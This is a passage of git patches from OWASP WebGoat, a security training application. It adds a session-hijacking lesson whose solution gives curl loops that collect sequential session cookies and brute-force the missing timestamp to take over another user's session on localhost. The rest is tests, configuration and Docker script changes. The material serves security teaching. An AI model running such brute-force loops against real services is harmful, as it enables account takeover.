+-H 'User-Agent: any'   \
+-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'   \
+-H 'Origin: http://localhost:8080'   \
+-H 'Sec-Fetch-Site: same-origin'   \
+-H 'Sec-Fetch-Mode: cors'   \
+-H 'Sec-Fetch-Dest: empty'   \
+-H 'Referer: http://localhost:8080/WebGoat/start.mvc'   \
+-H 'Accept-Language: en-US,en;q=0.9'   \
+-H "Cookie: JSESSIONID=T_kki1UnFP7XTxdEqX-XmZ25qgmKDFtqyoeHyQhW"   \
+--data-raw 'username=&password='   \
+--compressed \
+--output /dev/null \
+-v
+done
+
+# cookies
+<...>
+< Set-Cookie: hijack_cookie=3026815832223943295-1636913556701; path=/WebGoat; secure
+< Set-Cookie: hijack_cookie=3026815832223943296-1636913556848; path=/WebGoat; secure
+< Set-Cookie: hijack_cookie=3026815832223943297-1636913556998; path=/WebGoat; secure
+< Set-Cookie: hijack_cookie=3026815832223943299-1636913557143; path=/WebGoat; secure
+<...>
+----
+
+Note: a valid WebGoat JSESSIONID has to be used. It can be obtained after logging in into WebGoat.
+
+The 'hijack_cookie' beginning with 3026815832223943298 is missing. This is the value we want, we just need to figure out the second part.
+
+So our timestamp is between 1636913556998 and 1636913557143. Now we just need a program to do brute force this for us.
+
+[source, sh]
+----
+for i in $(seq 1636913556998 1636913557143); do
+curl 'http://localhost:8080/WebGoat/HijackSession/login'   \
+-H 'Connection: keep-alive'   \
+-H 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90"'   \
+-H 'Accept: */*'   \
+-H 'X-Requested-With: XMLHttpRequest'   \
+-H 'sec-ch-ua-mobile: ?0'   \
+-H 'User-Agent: any'   \
+-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'   \
+-H 'Origin: http://localhost:8080'   \
+-H 'Sec-Fetch-Site: same-origin'   \
+-H 'Sec-Fetch-Mode: cors'   \
+-H 'Sec-Fetch-Dest: empty'   \
+-H 'Referer: http://localhost:8080/WebGoat/start.mvc'   \
+-H 'Accept-Language: en-US,en;q=0.9'   \
+-H "Cookie: JSESSIONID=T_kki1UnFP7XTxdEqX-XmZ25qgmKDFtqyoeHyQhW; hijack_cookie=3026815832223943298-"$i""   \
+--data-raw 'username=&password='   \
+--compressed
+done
+----
+
+One of those requests will be a valid login and the lesson will be marked as completed.
diff --git a/webgoat-lessons/hijack-session/src/main/resources/lessonSolutions/html/HijackSession.html b/webgoat-lessons/hijack-session/src/main/resources/lessonSolutions/html/HijackSession.html
new file mode 100644
index 000000000..ac8ab94d5
--- /dev/null
+++ b/webgoat-lessons/hijack-session/src/main/resources/lessonSolutions/html/HijackSession.html
@@ -0,0 +1,14 @@
+<!DOCTYPE html>
+
+<html xmlns:th="http://www.thymeleaf.org">
+
+
+
+	<div class="lesson-page-wrapper">
+		<!-- reuse this block for each 'page' of content -->
+		<!-- include content here ... will be first page/tab  multiple -->
+		<div class="adoc-content" th:replace="doc:HijackSession_solution.adoc"></div>
+	</div>
+
+
+</html>
diff --git a/webgoat-lessons/hijack-session/src/main/resources/templates/hijackform.html b/webgoat-lessons/hijack-session/src/main/resources/templates/hijackform.html
new file mode 100644
index 000000000..16370fd90
--- /dev/null
+++ b/webgoat-lessons/hijack-session/src/main/resources/templates/hijackform.html
@@ -0,0 +1,24 @@
+<div class="row">
+	<div class="col-md-4">
+		<form class="attack-form" accept-charset="UNKNOWN" method="POST"
+			action="/WebGoat/HijackSession/login">
+			<div style="padding: 20px;" id="password-login">
+				<h4 style="border-bottom: 1px solid #c5c5c5;">Account Access</h4>
+				<fieldset>
+					<div class="form-group input-group">
+						<span class="input-group-addon"> <i
+							class="glyphicon glyphicon-user"></i>
+						</span> <input class="form-control" placeholder="User name"
+							name="username" type="text"></input>
+					</div>
+					<div class="form-group input-group">
+						<span class="input-group-addon"><i
+							class="glyphicon glyphicon-lock"></i></span> <input class="form-control"
+							placeholder="Password" name="password" type="password" />
+					</div>
+					<button type="submit" class="btn btn-primary btn-block">Access</button>
+				</fieldset>
+			</div>
+		</form>
+	</div>
+</div>
diff --git a/webgoat-lessons/hijack-session/src/test/java/org/owasp/webgoat/hijacksession/HijackSessionAssignmentTest.java b/webgoat-lessons/hijack-session/src/test/java/org/owasp/webgoat/hijacksession/HijackSessionAssignmentTest.java
new file mode 100644
index 000000000..19743825b
--- /dev/null
+++ b/webgoat-lessons/hijack-session/src/test/java/org/owasp/webgoat/hijacksession/HijackSessionAssignmentTest.java
@@ -0,0 +1,108 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.hijacksession;
+
+import static org.hamcrest.Matchers.emptyString;
+import static org.hamcrest.Matchers.not;
+import static org.mockito.ArgumentMatchers.any;
+import static org.mockito.Mockito.lenient;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.cookie;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
+import javax.servlet.http.Cookie;
+
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.junit.jupiter.api.extension.ExtendWith;
+import org.mockito.Mock;
+import org.mockito.junit.jupiter.MockitoExtension;
+import org.owasp.webgoat.assignments.AssignmentEndpointTest;
+import org.owasp.webgoat.hijacksession.cas.Authentication;
+import org.owasp.webgoat.hijacksession.cas.HijackSessionAuthenticationProvider;
+import org.springframework.test.util.ReflectionTestUtils;
+import org.springframework.test.web.servlet.MockMvc;
+import org.springframework.test.web.servlet.ResultActions;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+
+/***
+ *
+ * @author Angel Olle Blazquez
+ *
+ */
+
+@ExtendWith(MockitoExtension.class)
+class HijackSessionAssignmentTest extends AssignmentEndpointTest {
+
+    private MockMvc mockMvc;
+    private static final String COOKIE_NAME = "hijack_cookie";
+    private static final String LOGIN_CONTEXT_PATH = "/HijackSession/login";
+
+    @Mock
+    Authentication authenticationMock;
+
+    @Mock
+    HijackSessionAuthenticationProvider providerMock;
+
+    HijackSessionAssignment assignment;
+
+    @BeforeEach
+    void setup() {
+        assignment = new HijackSessionAssignment();
+        init(assignment);
+        ReflectionTestUtils.setField(assignment, "provider", new HijackSessionAuthenticationProvider());
+        mockMvc = standaloneSetup(assignment).build();
+    }
+
+    @Test
+    void testValidCookie() throws Exception {
+        lenient().when(authenticationMock.isAuthenticated()).thenReturn(true);
+        lenient().when(providerMock.authenticate(any(Authentication.class))).thenReturn(authenticationMock);
+        ReflectionTestUtils.setField(assignment, "provider", providerMock);
+
+        Cookie cookie = new Cookie(COOKIE_NAME, "value");
+
+        ResultActions result = mockMvc.perform(MockMvcRequestBuilders
+            .post(LOGIN_CONTEXT_PATH)
+            .cookie(cookie)
+            .param("username", "")
+            .param("password", ""));
+
+        result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+
+    }
+
+    @Test
+    void testBlankCookie() throws Exception {
+        ResultActions result = mockMvc.perform(MockMvcRequestBuilders
+            .post(LOGIN_CONTEXT_PATH)
+            .param("username", "webgoat")
+            .param("password", "webgoat"));
+
+        result.andExpect(cookie().value(COOKIE_NAME, not(emptyString())));
+        result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+
+    }
+
+}
diff --git a/webgoat-lessons/hijack-session/src/test/java/org/owasp/webgoat/hijacksession/cas/HijackSessionAuthenticationProviderTest.java b/webgoat-lessons/hijack-session/src/test/java/org/owasp/webgoat/hijacksession/cas/HijackSessionAuthenticationProviderTest.java
new file mode 100644
index 000000000..1ccaf5e01
--- /dev/null
+++ b/webgoat-lessons/hijack-session/src/test/java/org/owasp/webgoat/hijacksession/cas/HijackSessionAuthenticationProviderTest.java
@@ -0,0 +1,116 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source
+ * ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.hijacksession.cas;
+
+import static org.hamcrest.CoreMatchers.is;
+import static org.hamcrest.CoreMatchers.not;
+import static org.hamcrest.MatcherAssert.assertThat;
+
+import java.util.stream.Stream;
+
+import org.apache.commons.lang3.StringUtils;
+import org.junit.jupiter.api.DisplayName;
+import org.junit.jupiter.api.Test;
+import org.junit.jupiter.params.ParameterizedTest;
+import org.junit.jupiter.params.provider.Arguments;
+import org.junit.jupiter.params.provider.MethodSource;
+import org.owasp.webgoat.hijacksession.cas.Authentication.AuthenticationBuilder;
+
+/***
+ *
+ * @author Angel Olle Blazquez
+ *
+ */
+
+class HijackSessionAuthenticationProviderTest {
+
+    HijackSessionAuthenticationProvider provider = new HijackSessionAuthenticationProvider();
+
+    @ParameterizedTest
+    @DisplayName("Provider authentication test")
+    @MethodSource("authenticationForCookieValues")
+    void testProviderAuthenticationGeneratesCookie(Authentication authentication) {
+        Authentication auth = provider.authenticate(authentication);
+        assertThat(auth.getId(), not(StringUtils.isEmpty(auth.getId())));
+    }
+
+    @Test
+    void testAuthenticated() {
+        String id = "anyId";
+        provider.addSession(id);
+
+        Authentication auth = provider.authenticate(Authentication.builder().id(id).build());
+
+        assertThat(auth.getId(), is(id));
+        assertThat(auth.isAuthenticated(), is(true));
+
+        auth = provider.authenticate(Authentication.builder().id("otherId").build());
+
+        assertThat(auth.getId(), is("otherId"));
+        assertThat(auth.isAuthenticated(), is(false));
+    }
+
+    @Test
+    void testAuthenticationToString() {
+        AuthenticationBuilder authBuilder = Authentication.builder()
+            .name("expectedName")
+            .credentials("expectedCredentials")
+            .id("expectedId");
+
+        Authentication auth = authBuilder.build();
+
+        String expected = "Authentication.AuthenticationBuilder("
+                + "name=" + auth.getName()
+                + ", credentials=" + auth.getCredentials()
+                + ", id=" + auth.getId() + ")";
+
+        assertThat(authBuilder.toString(), is(expected));
+
+        expected = "Authentication(authenticated=" + auth.isAuthenticated()
+                + ", name=" + auth.getName()
+                + ", credentials=" + auth.getCredentials()
+                + ", id=" + auth.getId() + ")";
+
+        assertThat(auth.toString(), is(expected));
+
+    }
+
+    @Test
+    void testMaxSessions() {
+        for (int i = 0; i <= HijackSessionAuthenticationProvider.MAX_SESSIONS + 1; i++) {
+            provider.authorizedUserAutoLogin();
+            provider.addSession(null);
+        }
+
+        assertThat(provider.getSessionsSize(), is(HijackSessionAuthenticationProvider.MAX_SESSIONS));
+    }
+
+    private static Stream<Arguments> authenticationForCookieValues() {
+        return Stream.of(
+            Arguments.of((Object) null),
+            Arguments.of(Authentication.builder().name("any").credentials("any").build()),
+            Arguments.of(Authentication.builder().id("any").build()));
+    }
+
+}
diff --git a/webgoat-lessons/pom.xml b/webgoat-lessons/pom.xml
index f483656ae..36a330a16 100644
--- a/webgoat-lessons/pom.xml
+++ b/webgoat-lessons/pom.xml
@@ -43,7 +43,7 @@
         <module>path-traversal</module>
         <module>spoof-cookie</module>
         <module>logging</module>
-
+        <module>hijack-session</module>
     </modules>
 
     <dependencies>
diff --git a/webgoat-server/pom.xml b/webgoat-server/pom.xml
index ae1315ab5..dec76bfd0 100644
--- a/webgoat-server/pom.xml
+++ b/webgoat-server/pom.xml
@@ -154,6 +154,11 @@
             <artifactId>spoof-cookie</artifactId>
             <version>${project.version}</version>
         </dependency>
+        <dependency>
+            <groupId>org.owasp.webgoat.lesson</groupId>
+            <artifactId>hijack-session</artifactId>
+            <version>${project.version}</version>
+        </dependency>
         <dependency>
             <groupId>org.owasp.webgoat.lesson</groupId>
             <artifactId>webgoat-lesson-template</artifactId>

From 5107e111bffd8114c63ded4dbb1b3ca7034dde63 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Wed, 17 Nov 2021 23:08:52 +0100
Subject: [PATCH 103/227] test url fix

---
 .../src/test/java/org/owasp/webgoat/SessionManagementTest.java  | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java
index 458febbb8..1d086bbf4 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java
@@ -35,7 +35,7 @@ import org.junit.jupiter.api.Test;
 
 class SessionManagementTest extends IntegrationTest {
     
-    private static final String HIJACK_LOGIN_CONTEXT_PATH = "/HijackSession/login";
+    private static final String HIJACK_LOGIN_CONTEXT_PATH = "/WebGoat/HijackSession/login";
 
 
     @Test

From 48fd7f310ea4ddda4f72578ca3a681ba6f53b7ac Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Tue, 23 Nov 2021 09:07:53 +0000
Subject: [PATCH 104/227] Bump actions/cache from 2.1.5 to 2.1.7

Bumps [actions/cache](https://github.com/actions/cache) from 2.1.5 to 2.1.7.
- [Release notes](https://github.com/actions/cache/releases)
- [Commits](https://github.com/actions/cache/compare/v2.1.5...v2.1.7)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
---
 .github/workflows/branch_build.yml | 4 ++--
 .github/workflows/pr_build.yml     | 2 +-
 .github/workflows/release.yml      | 2 +-
 3 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
index ff1533f34..46d38723b 100644
--- a/.github/workflows/branch_build.yml
+++ b/.github/workflows/branch_build.yml
@@ -19,7 +19,7 @@ jobs:
           java-version: 17
           architecture: x64
       - name: Cache Maven packages
-        uses: actions/cache@v2.1.5
+        uses: actions/cache@v2.1.7
         with:
           path: ~/.m2
           key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
@@ -45,7 +45,7 @@ jobs:
           java-version: 17
           architecture: x64
       - name: Cache Maven packages
-        uses: actions/cache@v2.1.5
+        uses: actions/cache@v2.1.7
         with:
           path: ~/.m2
           key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/pr_build.yml b/.github/workflows/pr_build.yml
index 9823a87b2..1eee1f7b8 100644
--- a/.github/workflows/pr_build.yml
+++ b/.github/workflows/pr_build.yml
@@ -36,7 +36,7 @@ jobs:
           java-version: ${{ matrix.java }}
           architecture: x64
       - name: Cache Maven packages
-        uses: actions/cache@v2.1.5
+        uses: actions/cache@v2.1.7
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index e725c8fa3..74ad073da 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -25,7 +25,7 @@ jobs:
           architecture: x64
 
       - name: Cache Maven packages
-        uses: actions/cache@v2.1.5
+        uses: actions/cache@v2.1.7
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}

From f8dda37027eec813f71c69a3ad60d89b5e6945d1 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 21 Nov 2021 12:26:31 +0100
Subject: [PATCH 105/227] Rename properties

Rename `webwolf.url.*` to `webwolf.*.url` making it easier to move to a configuration class as no nested property is necessary
---
 .../src/main/resources/application-webgoat.properties         | 4 ++--
 .../org/owasp/webgoat/challenges/challenge7/Assignment7.java  | 2 +-
 .../password_reset/ResetLinkAssignmentForgotPassword.java     | 2 +-
 .../owasp/webgoat/password_reset/SimpleMailAssignment.java    | 2 +-
 .../owasp/webgoat/webwolf_introduction/LandingAssignment.java | 2 +-
 .../owasp/webgoat/webwolf_introduction/MailAssignment.java    | 2 +-
 .../xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java    | 2 +-
 7 files changed, 8 insertions(+), 8 deletions(-)

diff --git a/webgoat-container/src/main/resources/application-webgoat.properties b/webgoat-container/src/main/resources/application-webgoat.properties
index 3339d1ced..d873b1567 100644
--- a/webgoat-container/src/main/resources/application-webgoat.properties
+++ b/webgoat-container/src/main/resources/application-webgoat.properties
@@ -42,8 +42,8 @@ webgoat.default.language=en
 webwolf.host=${WEBWOLF_HOST:127.0.0.1}
 webwolf.port=${WEBWOLF_PORT:9090}
 webwolf.url=http://${webwolf.host}:${webwolf.port}/WebWolf
-webwolf.url.landingpage=http://${webwolf.host}:${webwolf.port}/landing
-webwolf.url.mail=http://${webwolf.host}:${webwolf.port}/mail
+webwolf.landingpage.url=http://${webwolf.host}:${webwolf.port}/landing
+webwolf.mail.url=http://${webwolf.host}:${webwolf.port}/mail
 
 spring.jackson.serialization.indent_output=true
 spring.jackson.serialization.write-dates-as-timestamps=false
diff --git a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/Assignment7.java b/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/Assignment7.java
index 5c1ee1fa5..0f33b7d96 100644
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/Assignment7.java
+++ b/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/Assignment7.java
@@ -46,7 +46,7 @@ public class Assignment7 extends AssignmentEndpoint {
 
     @Autowired
     private RestTemplate restTemplate;
-    @Value("${webwolf.url.mail}")
+    @Value("${webwolf.mail.url}")
     private String webWolfMailURL;
 
     @GetMapping("/challenge/7/reset-password/{link}")
diff --git a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/ResetLinkAssignmentForgotPassword.java b/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/ResetLinkAssignmentForgotPassword.java
index 6c0e54f33..eaae33bdb 100644
--- a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/ResetLinkAssignmentForgotPassword.java
+++ b/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/ResetLinkAssignmentForgotPassword.java
@@ -52,7 +52,7 @@ public class ResetLinkAssignmentForgotPassword extends AssignmentEndpoint {
     private final String webWolfMailURL;
 
     public ResetLinkAssignmentForgotPassword(RestTemplate restTemplate,
-                                             @Value("${webwolf.url.mail}") String webWolfMailURL) {
+                                             @Value("${webwolf.mail.url}") String webWolfMailURL) {
         this.restTemplate = restTemplate;
         this.webWolfMailURL = webWolfMailURL;
     }
diff --git a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/SimpleMailAssignment.java b/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/SimpleMailAssignment.java
index a5bd10b05..048f5e78c 100644
--- a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/SimpleMailAssignment.java
+++ b/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/SimpleMailAssignment.java
@@ -48,7 +48,7 @@ public class SimpleMailAssignment extends AssignmentEndpoint {
     private final String webWolfURL;
     private RestTemplate restTemplate;
 
-    public SimpleMailAssignment(RestTemplate restTemplate, @Value("${webwolf.url.mail}") String webWolfURL) {
+    public SimpleMailAssignment(RestTemplate restTemplate, @Value("${webwolf.mail.url}") String webWolfURL) {
         this.restTemplate = restTemplate;
         this.webWolfURL = webWolfURL;
     }
diff --git a/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/LandingAssignment.java b/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/LandingAssignment.java
index 2600c0271..c1477bdc2 100644
--- a/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/LandingAssignment.java
+++ b/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/LandingAssignment.java
@@ -43,7 +43,7 @@ import java.net.URISyntaxException;
 @RestController
 public class LandingAssignment extends AssignmentEndpoint {
 
-    @Value("${webwolf.url.landingpage}")
+    @Value("${webwolf.landingpage.url}")
     private String landingPageUrl;
 
     @PostMapping("/WebWolf/landing")
diff --git a/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/MailAssignment.java b/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/MailAssignment.java
index 8f6dbfebb..dd5967aa6 100644
--- a/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/MailAssignment.java
+++ b/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/MailAssignment.java
@@ -43,7 +43,7 @@ public class MailAssignment extends AssignmentEndpoint {
     private final String webWolfURL;
     private RestTemplate restTemplate;
 
-    public MailAssignment(RestTemplate restTemplate, @Value("${webwolf.url.mail}") String webWolfURL) {
+    public MailAssignment(RestTemplate restTemplate, @Value("${webwolf.mail.url}") String webWolfURL) {
         this.restTemplate = restTemplate;
         this.webWolfURL = webWolfURL;
     }
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java
index 888bb25d3..c46b0504a 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java
@@ -57,7 +57,7 @@ public class SimpleXXE extends AssignmentEndpoint {
     @Value("${webgoat.server.directory}")
     private String webGoatHomeDirectory;
 
-    @Value("${webwolf.url.landingpage}")
+    @Value("${webwolf.landingpage.url}")
     private String webWolfURL;
 
 

From d496c929b3118875e35f822f46227901b0d10679 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Tue, 23 Nov 2021 09:54:51 +0100
Subject: [PATCH 106/227] Use variables to check WebWolf host and port

WebWolf can start on a different port, the assignment should take this into account and not check for a hardcoded value.

Resolves: #1055
---
 .../ResetLinkAssignmentForgotPassword.java    | 27 ++++++++++---------
 1 file changed, 15 insertions(+), 12 deletions(-)

diff --git a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/ResetLinkAssignmentForgotPassword.java b/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/ResetLinkAssignmentForgotPassword.java
index eaae33bdb..54b95b21e 100644
--- a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/ResetLinkAssignmentForgotPassword.java
+++ b/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/ResetLinkAssignmentForgotPassword.java
@@ -37,8 +37,6 @@ import org.springframework.web.client.RestTemplate;
 import javax.servlet.http.HttpServletRequest;
 import java.util.UUID;
 
-import static org.springframework.util.StringUtils.hasText;
-
 /**
  * Part of the password reset assignment. Used to send the e-mail.
  *
@@ -49,11 +47,17 @@ import static org.springframework.util.StringUtils.hasText;
 public class ResetLinkAssignmentForgotPassword extends AssignmentEndpoint {
 
     private final RestTemplate restTemplate;
+    private String webWolfHost;
+    private String webWolfPort;
     private final String webWolfMailURL;
 
     public ResetLinkAssignmentForgotPassword(RestTemplate restTemplate,
+                                             @Value("${webwolf.host}") String webWolfHost,
+                                             @Value("${webwolf.port}") String webWolfPort,
                                              @Value("${webwolf.mail.url}") String webWolfMailURL) {
         this.restTemplate = restTemplate;
+        this.webWolfHost = webWolfHost;
+        this.webWolfPort = webWolfPort;
         this.webWolfMailURL = webWolfMailURL;
     }
 
@@ -63,18 +67,17 @@ public class ResetLinkAssignmentForgotPassword extends AssignmentEndpoint {
         String resetLink = UUID.randomUUID().toString();
         ResetLinkAssignment.resetLinks.add(resetLink);
         String host = request.getHeader("host");
-        if (hasText(email)) {
-            if (email.equals(ResetLinkAssignment.TOM_EMAIL) && (host.contains("9090")||host.contains("webwolf"))) { //User indeed changed the host header.
-                ResetLinkAssignment.userToTomResetLink.put(getWebSession().getUserName(), resetLink);
-                fakeClickingLinkEmail(host, resetLink);
-            } else {
-                try {
-                    sendMailToUser(email, host, resetLink);
-                } catch (Exception e) {
-                    return failed(this).output("E-mail can't be send. please try again.").build();
-                }
+        if (ResetLinkAssignment.TOM_EMAIL.equals(email) && (host.contains(webWolfPort) || host.contains(webWolfHost))) { //User indeed changed the host header.
+            ResetLinkAssignment.userToTomResetLink.put(getWebSession().getUserName(), resetLink);
+            fakeClickingLinkEmail(host, resetLink);
+        } else {
+            try {
+                sendMailToUser(email, host, resetLink);
+            } catch (Exception e) {
+                return failed(this).output("E-mail can't be send. please try again.").build();
             }
         }
+
         return success(this).feedback("email.send").feedbackArgs(email).build();
     }
 

From 8dd66fc0ffac92c453a1d5a2fec9c4eccd3fa782 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Fri, 19 Nov 2021 16:58:23 +0100
Subject: [PATCH 107/227] Improve Docker start up script

- Make sure the last line contains the information
- Split in separate functions
- Add option to skip starting nginx (by default it is started)
---
 RELEASE_NOTES.md  |  6 ++++
 docker/Dockerfile |  3 +-
 docker/start.sh   | 84 ++++++++++++++++++++++++++++++++++++-----------
 3 files changed, 73 insertions(+), 20 deletions(-)

diff --git a/RELEASE_NOTES.md b/RELEASE_NOTES.md
index 78b1a7e15..3fbab978a 100644
--- a/RELEASE_NOTES.md
+++ b/RELEASE_NOTES.md
@@ -1,5 +1,11 @@
 # WebGoat release notes 
 
+## Unreleased
+
+### New functionality
+
+- Update the Docker startup script, it is now possible to pass `skip-nginx` or set `SKIP_NGINX` as environment variable.
+
 ## Version 8.2.2
 
 ### New functionality
diff --git a/docker/Dockerfile b/docker/Dockerfile
index 83fd7470d..11ee7f65d 100644
--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -11,9 +11,10 @@ COPY --chown=webgoat index.html /usr/share/nginx/html/
 COPY --chown=webgoat target/webgoat-server-*.jar /home/webgoat/webgoat.jar
 COPY --chown=webgoat target/webwolf-*.jar /home/webgoat/webwolf.jar
 COPY --chown=webgoat start.sh /home/webgoat
+RUN chmod +x /home/webgoat/start.sh
 
 EXPOSE 8080
 EXPOSE 9090
 
 WORKDIR /home/webgoat
-ENTRYPOINT /bin/bash start.sh
+ENTRYPOINT ["./start.sh"]
diff --git a/docker/start.sh b/docker/start.sh
index 3a37439a6..d25b00214 100755
--- a/docker/start.sh
+++ b/docker/start.sh
@@ -1,26 +1,72 @@
 #!/bin/bash
 
 cd /home/webgoat 
-service nginx start
-sleep 1
-echo "Starting WebGoat...."
 
-java \
- -Duser.home=/home/webgoat \
- -Dfile.encoding=UTF-8 \
- --add-opens java.base/java.lang=ALL-UNNAMED \
- --add-opens java.base/java.util=ALL-UNNAMED \
- --add-opens java.base/java.lang.reflect=ALL-UNNAMED \
- --add-opens java.base/java.text=ALL-UNNAMED \
- --add-opens java.desktop/java.beans=ALL-UNNAMED \
- --add-opens java.desktop/java.awt.font=ALL-UNNAMED \
- --add-opens java.base/sun.nio.ch=ALL-UNNAMED \
- --add-opens java.base/java.io=ALL-UNNAMED \
- -jar webgoat.jar --server.address=0.0.0.0 > webgoat.log &
+function should_start_nginx() {
+  if [[ -v "${SKIP_NGINX}" ]]; then
+    return 1
+  else
+    for i in "${commandline_args[@]}" ; do [[ $i == "skip-nginx" ]] && return 1 ; done
+  fi
+  return 0
+}
+
+function nginx() {
+  if should_start_nginx; then
+    echo "Starting nginx..."
+    service nginx start
+  fi
+}
+
+function webgoat() {
+  echo "Starting WebGoat...."
+  java \
+   -Duser.home=/home/webgoat \
+   -Dfile.encoding=UTF-8 \
+   --add-opens java.base/java.lang=ALL-UNNAMED \
+   --add-opens java.base/java.util=ALL-UNNAMED \
+   --add-opens java.base/java.lang.reflect=ALL-UNNAMED \
+   --add-opens java.base/java.text=ALL-UNNAMED \
+   --add-opens java.desktop/java.beans=ALL-UNNAMED \
+   --add-opens java.desktop/java.awt.font=ALL-UNNAMED \
+   --add-opens java.base/sun.nio.ch=ALL-UNNAMED \
+   --add-opens java.base/java.io=ALL-UNNAMED \
+   -jar webgoat.jar --server.address=0.0.0.0 > webgoat.log
+}
+
+function webwolf() {
+  echo "Starting WebWolf..."
